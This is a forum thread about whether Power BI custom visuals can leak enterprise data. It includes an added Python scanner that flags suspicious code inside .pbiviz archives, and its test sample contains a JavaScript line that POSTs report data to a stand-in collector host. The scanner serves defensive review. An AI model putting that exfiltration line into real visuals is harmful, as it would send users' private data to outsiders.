AlexNYExcel
Frequent Visitor


How safe are custom visuals?

 

When I try to upload new custom visuals, some of them really great, there is this prompt:

Custom Visuals are not provided by Microsoft and could contain security or privacy risks. Only import this custom visual if you trust its author and source.

 

I would like to raise some questions:

Can custom visuals be a reason for data leakage?

Could Microsoft allow such a loophole in Business Intelligence software for Enterprise?

 

If you would like to answer no, what is the point of this warning?

Looking for a response in order to utilize Power BI at 100%.

 

Thank you.

9 REPLIES 9
slern
Regular Visitor

Hello,


I work for an agency and we are considering using Power BI and the custom visuals **ONLY from the Power BI Custom Visuals Gallery** for our reporting needs. That said, we need an official Microsoft response to be able to move forward. We are mainly concerned with our data being able to be leaked by using/importing a custom visual from the gallery.

Thank you for your time and consideration of this question.

Anonymous
Not applicable

If you are worried about leaks in the Custom Visuals, you will first need to figure out what sort of leak you are concerned with.

Are you worried about:

  1. Backdoors and leaks within the Custom Visual Code
  2. Reports storing identifiable data that a user could export and use.
  3. Unauthorized users running reports or dashboards they aren't supposed to.
  4. Some other leak I've not listed.

 

I would suggest for each:

  1. You can inspect the code yourself for each visual you download. PBIVIZ files can be opened by 7-Zip and the code is all held in essentially text files. You may need someone with TypeScript or JavaScript experience to aid you.
  2. Depending on how you write your reports, this may or may not be an issue.
  3. If you use Row Level Security, you can lock out data from certain users and prevent non-authorized users from seeing anything.
  4. Post the scenario you are concerned with.
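
The inspection step suggested in item 1 above, as an added example that is not part of the original post or any Microsoft tooling: it treats the .pbiviz file as a zip archive, reads every member as text, and flags constructs that deserve a manual look. The indicator patterns, the size limit and the sample archive are constructed assumptions; a hit is a prompt for review, not proof of malice.

```python
import io
import re
import zipfile

MAX_MEMBER_BYTES = 20 * 1024 * 1024  # skip implausibly large members instead of inflating them

# Constructed triage heuristics (an assumption, not a Microsoft checklist):
# constructs that can send data off the page or reach outside the visual.
INDICATORS = {
    "network": re.compile(r"\b(?:fetch|XMLHttpRequest|WebSocket|EventSource|sendBeacon)\b"),
    "dynamic-code": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(|\batob\s*\("),
    "outside-visual": re.compile(r"\b(?:window\.(?:parent|top)|document\.cookie|localStorage)\b"),
    "url": re.compile(r"https?://[^\s\"'\\<>)]+"),
}


def scan_pbiviz(data: bytes, context: int = 30):
    """Return sorted (member, category, snippet) findings for a .pbiviz archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            if info.file_size > MAX_MEMBER_BYTES:
                findings.append((info.filename, "oversized", str(info.file_size)))
                continue
            text = archive.read(info).decode("utf-8", errors="replace")
            for category, pattern in INDICATORS.items():
                for match in pattern.finditer(text):
                    # Bundles are often minified onto one line, so keep a
                    # character window around the hit rather than a line number.
                    start = max(0, match.start() - context)
                    snippet = text[start:match.end() + context].replace("\n", " ")
                    findings.append((info.filename, category, snippet))
    return sorted(findings)


def build_sample() -> bytes:
    """Constructed sample archive (not a real visual) so the example runs offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("package.json", '{"visual": {"name": "sampleVisual", "version": "1.0.0"}}')
        z.writestr("resources/visual.js", 'function update(o){var v=o.dataViews;'
                   'fetch("https://collector.example/in",{method:"POST",body:JSON.stringify(v)});}')
    return buf.getvalue()


if __name__ == "__main__":
    for member, category, snippet in scan_pbiviz(build_sample()):
        print(f"{member}: [{category}] ...{snippet}...")
```

To check a downloaded visual, pass the file's bytes, for example `scan_pbiviz(open("visual.pbiviz", "rb").read())`, where the file name is a placeholder.
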
djnww
Impactful Individual

Can someone from the Power BI team provide a definitive response to the original question posted by @AlexNYExcel?

 

I understand the reasons for the warning as any Mr Smith can create and upload malicious custom visuals into Power BI.

 

However, are the custom visuals in the official Power BI Visuals Gallery completely safe as they have been approved by Microsoft? My company has 8000 staff and we are rolling out Power BI across most departments. If Power BI cannot confirm that the official Power BI Visuals Gallery is safe, then we have a problem as private data may be leaked or it may contain a virus.

 

Again, I would just like clarification over the safety of using the approved custom visuals found on the official Microsoft Power BI Visuals Gallery.

 

Cheers,

Daniel

 

 

Daniel, 

 

Did you ever get a response back on this? Are custom visuals on the official Power BI Visuals Gallery safe and approved by Microsoft?

This is an old topic but I am interested to know as well.

Anonymous
Not applicable

Can anybody tell me, are there any security risks in using custom visuals available in the Power BI Visuals Gallery?

The custom visuals in the Visuals Gallery are reviewed by Microsoft prior to being published. With JavaScript, it is possible to do pretty much anything, so the warning and review process are there for good reason.

 

For example, it's possible to create malicious visuals that can alter other charts or send private data elsewhere. That's not unique to Power BI--it's possible in general for web development. Something like this "donut eater" that replaces the donuts from other charts would never be approved for the Gallery, but anyone could package something like this independently as a .pbiviz file and distribute it outside of the Gallery. Replacing an image is kind of a fun example, but what if it subtly changed *values* in those charts--or worse? I would heed the warning and, in my opinion, only use visuals from the Gallery or ones that have been otherwise verified to not contain dangerous code.

So, you say that the Gallery on the web at Powerbi.com has nice visualizations that are approved by Microsoft and do not have security risks.

Any vis from any other source could be dangerous?

Yes. It's likely that any visual that is distributed outside of the Gallery will *not* be dangerous--but there is always that risk.
